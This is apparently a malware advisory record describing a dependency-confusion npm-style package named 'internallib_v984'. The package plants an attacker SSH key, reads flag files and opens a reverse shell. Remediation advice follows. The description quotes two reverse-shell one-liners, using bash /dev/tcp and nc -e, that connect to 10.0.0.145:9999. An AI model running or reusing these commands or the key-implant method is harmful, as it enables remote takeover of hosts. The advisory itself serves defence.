MAL-2026-5695

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3c46879ad94169111411f91b210779628bb14a5d16843ec2bec42bf418affdf8) Package exports a single `command()` function that, when invoked, performs three coordinated attacks against the host: (1) appends a hardcoded attacker-controlled SSH public key (`tr0n@DESKTOP-GVIA2J0`) to `authorized_keys` under `/root/.ssh`, `/home/gitlab-runner/.ssh`, and `/home/internal/.ssh`, granting persistent remote root and CI-runner login; (2) reads `/root/root.txt`, `/home/internal/user.txt`, and `/home/gitlab-runner/user.txt` and writes their contents to stdout; (3) opens a reverse shell to `10.0.0.145:9999` using three redundant methods (`bash -i >& /dev/tcp/10.0.0.145/9999 0>&1`, `nc -e /bin/bash 10.0.0.145 9999`, and a Node `net.Socket` connecting to the same address with `spawn('/bin/bash')`). The package has no README, no author or repository metadata, and the name `internallib_v984` is shaped to win a dependency-confusion resolution against an internal library of that name. There is no legitimate functionality — the entire module is offensive tooling. Any consumer that resolves this package from the public registry and calls its export is fully compromised: persistent SSH access via the implanted key, live interactive C2 via the reverse shell, and exfiltration of CTF-style flag files. The hardcoded RFC1918 destination (`10.0.0.145`) further indicates the attacker expects to land inside a corporate or lab network where that address is routable.

## Source: ghsa-malware (a08961f26609280db99444778ce38929914922ef82a00497645032bf998ecc83) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.